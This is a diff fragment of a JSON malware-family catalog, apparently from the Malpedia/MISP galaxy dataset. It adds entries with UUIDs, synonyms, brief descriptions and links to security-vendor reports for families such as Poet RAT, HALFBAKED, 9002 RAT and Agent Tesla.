"https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph", + "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/", + "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/", + "https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/" + ], + "synonyms": [ + "FreakOut" + ], + "type": [] + }, + "uuid": "2351539a-165a-4886-b5fe-f56fdf6b167a", + "value": "N3Cr0m0rPh" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.networm", + "https://github.com/pylyf/NetWorm" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6c6acd00-cdc2-460d-8edf-003b84875b5d", + "value": "NetWorm" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.pirat", + "https://vk.com/m228228?w=wall306895781_177" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bca94d33-e5a1-4bcc-981e-f35fd74a79d1", + "value": "PIRAT" + }, + { + "description": "Cisco Talos has discovered a Python-based RAT they call Poet RAT. It is dropped from a Word document and delivered including a Python interpreter and required libraries. The name originates from references to Shakespeare. Exfiltration happens through FTP.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.poet_rat", + "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://blog.talosintelligence.com/2020/10/poetrat-update.html", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b07819a9-a2f7-454d-a520-c6424cbf1ed4", + "value": "Poet RAT" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.pupy", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf", "https://github.com/n1nj4sec/pupy" ], "synonyms": [], @@ -3637,6 +7194,48 @@ "uuid": "afcc9bfc-1227-4bb0-a88a-5accdbfd58fa", "value": "pupy (Python)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.pyark", + "https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "01f15f4e-dd40-4246-9b99-c0d81306e37f", + "value": "PyArk" + }, + { + "description": "PyVil RAT", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.pyvil", + "https://www.cybereason.com/blog/no-rest-for-the-wicked-evilnum-unleashes-pyvil-rat", + "https://twitter.com/ESETresearch/status/1360178593968623617" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2cf75f3c-116f-4faf-bd32-ba3a5e2327cf", + "value": "PyVil" + }, + { + "description": "Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.responder", + "https://github.com/lgandx/Responder" + ], + "synonyms": [ + "SpiderLabs Responder" + ], + "type": [] + }, + "uuid": "3271b5ca-c044-4ab8-bbfc-0d6e1a6601fc", + "value": "Responder" + }, { "description": "", "meta": { @@ -3651,6 +7250,85 @@ "uuid": "30a22cdb-9393-460b-86ae-08d97c626155", "value": "Saphyra" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.spacecow", + "https://github.com/TheSph1nx/SpaceCow" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ff5c0845-6740-45d5-bd34-1cf69c635356", + "value": "SpaceCow" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.stealler", + "https://habr.com/en/sandbox/135410/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "689247a2-4e75-4802-ab94-484fc3d6a18e", + "value": "stealler" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.stitch", + "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/", + "https://github.com/nathanlopez/Stitch" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6239201b-a0bd-4f01-8bbe-79c6fc5fa861", + "value": "Stitch" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001", + "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6d96cd1e-98f4-4784-9982-397c5df19bd9", + "value": "unidentified_001" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002", + "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7e5fe6ca-3323-409a-a5bb-d34f60197b99", + "value": "unidentified_002" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003", + "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003" + ], + "synonyms": [], + "type": [] + }, + "uuid": "43282411-4999-4066-9b99-2e94a17acbd4", + "value": "unidentified_003" + }, { "description": "", "meta": { @@ -3664,12 +7342,56 @@ "uuid": "9f85f4fc-1cce-4557-b3d8-b9ef522fafb2", "value": "FlexiSpy (symbian)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.forbiks", + "https://persianov.net/windows-worms-forbix-worm-analysis", + "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2017-090807-0934-99" + ], + "synonyms": [ + "Forbix" + ], + "type": [] + }, + "uuid": "2ad12163-3a8e-4ece-969e-ac616303ebe1", + "value": "forbiks" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.ggldr", + "https://www.forcepoint.com/blog/x-labs/carbanak-group-uses-google-malware-command-and-control" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8ca31b9b-6e78-4dcc-9d14-dfd97d44994e", + "value": "GGLdr" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.grinju", + "https://medium.com/@vishal_thakur/grinju-malware-anti-analysis-on-steroids-part-1-535e72e650b8", + "https://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f0a64323-62a6-4c5a-bb3d-44bd3b11507f", + "value": "Grinju Downloader" + }, { "description": "The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information.\r\nHALFBAKED listens for the following commands from the C2 server:\r\n\r\n info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI \r\n queries\r\n processList: Send list of process running\r\n screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)\r\n runvbs: Executes a VB script\r\n runexe: Executes EXE file\r\n runps1: Executes PowerShell script\r\n delete: Delete the specified file\r\n update: Update the specified file", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked", "https://attack.mitre.org/software/S0151/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" ], "synonyms": [], @@ -3678,6 +7400,160 @@ "uuid": "095c995c-c916-488e-944d-a3f4b9842926", "value": "HALFBAKED" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.iloveyou", + "https://resources.sei.cmu.edu/library/asset-view.cfm?assetID=496186" + ], + "synonyms": [ + "Love Bug", + "LoveLetter" + ], + "type": [] + }, + "uuid": "bba3f3c9-f65f-45f1-a482-7209b9fa5adb", + "value": "Iloveyou" + }, + { + "description": "Malware is delivered by emails, containing links to ZIP files or ZIP attachments. The ZIP contains a VBscript that, when executed, downloads additional files from AWS S3, Google Drive or other cloud hosting services. The downloaded files are encrypted .exe and .dll files.\r\nThe malware targets banking clients in Portugal.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lampion", + "https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/", + "https://seguranca-informatica.pt/new-release-of-lampion-trojan-spreads-in-portugal-with-some-improvements-on-the-vbs-downloader", + "https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/", + "https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/", + "https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "97f89048-2a57-48d5-9272-0d1061a14eca", + "value": "lampion" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lockscreen", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/lockscreen-ransomware-phishing-leads-to-google-play-card-scam/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a583a2db-616e-48e5-b12b-088a378c2307", + "value": "lockscreen" + }, + { + "description": "Downloads NodeJS when deployed.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.nodejs_ransom", + "https://dissectingmalwa.re/the-opposite-of-fileless-malware-nodejs-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "93c87125-7150-4bc6-a0f9-b46ff8de1839", + "value": "NodeJS Ransomware" + }, + { + "description": "According to the author, this is a JavaScript based Empire launcher that runs with its own embedded powershell host to not be dependent on local powershell availability.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.starfighter", + "https://github.com/Cn33liz/StarFighters" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e24b852c-3ede-42ac-8d04-68ab96bf53a0", + "value": "Starfighter (VBScript)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_001", + "https://twitter.com/JohnLaTwC/status/1118278148993339392" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ba354d45-bc41-40cd-93b2-26139db296bd", + "value": "Unidentified VBS 001" + }, + { + "description": "Unnamed malware. Delivered as remote template that drops a VBS file, which uses LOLBINs to crawl the disk and exfiltrate data zipped up via winrar.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_002", + "https://www.clearskysec.com/operation-kremlin/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d8e8d701-ebe4-44ab-8c5b-70a11246ddf1", + "value": "Unidentified 002 (Operation Kremlin)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_003", + "https://aaqeel01.wordpress.com/2021/01/18/docx-files-template-injection/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d5955c4b-f507-4b3f-8d57-080849aba831", + "value": "Unidentified 003 (Gamaredon Downloader)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.whiteshadow", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware" + ], + "synonyms": [], + "type": [] + }, + "uuid": "dc857b7d-f228-4aa5-9e89-f7e17bb7ea8c", + "value": "WhiteShadow" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger", + "https://habr.com/ru/company/group-ib/blog/477198/", + "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--89" + ], + "synonyms": [ + "404KeyLogger", + "Snake Keylogger" + ], + "type": [] + }, + "uuid": "6b87fada-86b3-449d-826d-a89858121b68", + "value": "404 Keylogger" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.4h_rat", + "https://github.com/securitykitten/malware_references/blob/master/crowdstrike-intelligence-report-putter-panda.original.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "823f4eb9-ad37-4fab-8e69-3bdae47a0028", + "value": "4h_rat" + }, { "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"", "meta": { @@ -3693,21 +7569,60 @@ "value": "7ev3n" }, { - "description": "", + "description": "8T_Dropper has been used by Chinese threat actor TA428 in order to install Cotx RAT onto victim's machines during Operation LagTime IT. According to Proofpoint the attack was developed against a number of government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes. The dropper was delivered through an RTF document exploiting CVE-2018-0798.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper", + "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/", + "https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a?", + "https://tradahacking.vn/another-malicious-document-with-cve-2017-11882-839e9c0bbf2f", + "https://nao-sec.org/2021/01/royal-road-redive.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf", + "https://blog.malwarelab.pl/posts/on_the_royal_road/", + "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://community.riskiq.com/article/56fa1b2f", + "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746", + "https://securelist.com/cycldek-bridging-the-air-gap/97157/", + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-attribution-object-using-rtf-object-dimensions-track-apt-phishing-weaponizers/", + "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", + "https://tradahacking.vn/l%C3%A0-1937cn-hay-oceanlotus-hay-lazarus-6ca15fe1b241", + "https://community.riskiq.com/article/5fe2da7f" + ], + "synonyms": [ + "8t_dropper", + "RoyalRoad" + ], + "type": [] + }, + "uuid": "df755d5f-db11-417d-8fed-b7abdc826590", + "value": "8.t Dropper" + }, + { + "description": "9002 RAT is a Remote Access Tool typically observed to be used by an APT to control a victim's machine. It has been spread over via zero day exploits (e.g. targeting Internet Explorer) as well as via email attachments. The infection chain starts by opening a .LNK (an OLE packager shell object) that executes a Powershell command.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002", - "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", - "https://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/6894315", - "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/", - "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf", "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/", + "https://www.secureworks.com/research/threat-profiles/bronze-keystone", + "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html", + "https://www.infopoint-security.de/medien/the-elderwood-project.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-express", + "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", + "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", + "https://www.secureworks.com/research/threat-profiles/bronze-firestone", "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html", + "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/elderwood-project-12-en.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/" ], "synonyms": [ + "HOMEUNIX", "Hydraq", "McRAT" ], @@ -3716,17 +7631,34 @@ "uuid": "bab647d7-c9d6-4697-8fd2-1295c7429e1f", "value": "9002 RAT" }, + { + "description": "Uses Discord as C&C, has ransomware feature.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon", + "https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "97be2d1a-878d-46bd-8ee7-d8798ec61ef1", + "value": "Abaddon" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos", + "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/", "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", - "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/", - "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software" + "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://www.carbonblack.com/2020/05/21/tau-technical-report-new-attack-combines-tinypos-with-living-off-the-land-techniques-for-scraping-credit-card-data/", + "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/" ], "synonyms": [ - "PinkKite" + "PinkKite", + "TinyPOS" ], "type": [] }, @@ -3737,8 +7669,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.abantes", - "https://github.com/ElektroKill/AbantesTrojan" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.abantes" ], "synonyms": [], "type": [] @@ -3758,6 +7689,67 @@ "uuid": "e46262cd-961f-4c7d-8976-0d35a066ab83", "value": "Abbath Banker" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.absentloader", + "https://github.com/Tlgyt/AbSent-Loader", + "https://twitter.com/cocaman/status/1260069549069733888" + ], + "synonyms": [], + "type": [] + }, + "uuid": "532d67fc-0c93-4345-80c4-0c1657056d5e", + "value": "AbSent Loader" + }, + { + "description": "A Linux backdoor that was apparently ported to Windows. This entry represents the Windows version. It appears the Linux version was written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.acbackdoor", + "https://www.bleepingcomputer.com/news/security/linux-windows-users-targeted-with-new-acbackdoor-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9aa1a516-bd88-4038-a37d-cf66c607e68c", + "value": "ACBackdoor (Windows)" + }, + { + "description": "ACEHASH is described by FireEye as combined credential harvester that consists of two components, a loader and encrypted/compressed payload. To execute, a password is necessary (e.g. 9839D7F1A0) and the individual modules are addressed with parameters (-m, -w, -h).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.acehash", + "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas" + ], + "synonyms": [], + "type": [] + }, + "uuid": "51f8c94a-572f-450b-a52f-d3da96302d6b", + "value": "ACEHASH" + }, + { + "description": "Unit42 found AcidBox in February 2019 and describes it as a malware family used by an unknown threat actor in 2017 against Russian entities, as stated by Dr.Web. It reused and improved an exploit for VirtualBox previously used by Turla. The malware itself is a modular toolkit, featuring both usermode and kernelmode components and anti-analysis techniques such as stack-based string obfuscation or dynamic XOR-encoded API usage.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.epicturla.com/blog/acidbox-clustering", + "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html", + "https://unit42.paloaltonetworks.com/acidbox-rare-malware/" + ], + "synonyms": [ + "MagicScroll" + ], + "type": [] + }, + "uuid": "4ccc1ec4-6008-4788-95d9-248749f5a7fe", + "value": "AcidBox" + }, { "description": "AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more.", "meta": { @@ -3775,8 +7767,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym", - "https://www.arbornetworks.com/blog/asert/acronym-m-is-for-malware/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym" ], "synonyms": [], "type": [] @@ -3785,7 +7776,20 @@ "value": "Acronym" }, { - "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.adamantium_thief", + "https://github.com/LimerBoy/Adamantium-Thief" + ], + "synonyms": [], + "type": [] + }, + "uuid": "28e01527-dbb5-4331-b5bf-5658ebf58297", + "value": "Adamantium Thief" + }, + { + "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim\u2019s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", @@ -3798,6 +7802,19 @@ "uuid": "1ed36f9a-ae00-4d16-bbf7-e97217385fb1", "value": "AdamLocker" }, + { + "description": "Some Ransomware distributed by TA547 in Australia", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.adhubllka", + "https://www.proofpoint.com/us/blog/security-briefs/ta547-pivots-ursnif-banking-trojan-ransomware-australian-campaign" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ebf31d45-922a-42ad-b326-8a72ba6dead7", + "value": "Adhubllka" + }, { "description": "", "meta": { @@ -3816,7 +7833,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot", - "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot" + "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot", + "https://www.bromium.com/second-stage-attack-analysis/" ], "synonyms": [], "type": [] @@ -3837,6 +7855,21 @@ "uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58", "value": "Adylkuzz" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.afrodita", + "https://twitter.com/_CPResearch_/status/1201957880909484033", + "https://dissectingmalwa.re/not-so-nice-after-all-afrodita-ransomware.html", + "https://github.com/albertzsigovits/malware-notes/blob/master/Afrodita.md" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4c9f8ad2-ace4-42e5-ab70-efdfaad4d1bd", + "value": "Afrodita" + }, { "description": "", "meta": { @@ -3845,13 +7878,26 @@ "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/", "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", + "https://unit42.paloaltonetworks.com/ironnetinjector/", "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html", + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/", "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://www.msreverseengineering.com/blog/2020/8/31/an-exhaustively-analyzed-idb-for-comrat-v4", + "https://www.secureworks.com/research/threat-profiles/iron-hunter", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a", + "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf", "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat" ], "synonyms": [ "ComRAT", + "Minit", "Sun rootkit" ], "type": [] @@ -3864,22 +7910,94 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", - "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/", - "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting", - "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-many-roads-leading-to-agent-tesla/", + "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", + "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/", + "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/", - "https://blogs.forcepoint.com/security-labs/part-two-camouflage-netting" + "https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4", + "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-2/", + "https://www.seqrite.com/blog/gorgon-apt-targeting-msme-sector-in-india/", + "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting", + "https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/", + "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr", + "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/", + "https://isc.sans.edu/diary/27088", + "https://www.secureworks.com/research/threat-profiles/gold-galleon", + "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/", + "https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/", + "https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/", + "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", + "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", + "https://www.telsy.com/wp-content/uploads/ATR_82599-1.pdf", + "https://blog.morphisec.com/agent-tesla-a-day-in-a-life-of-ir", + 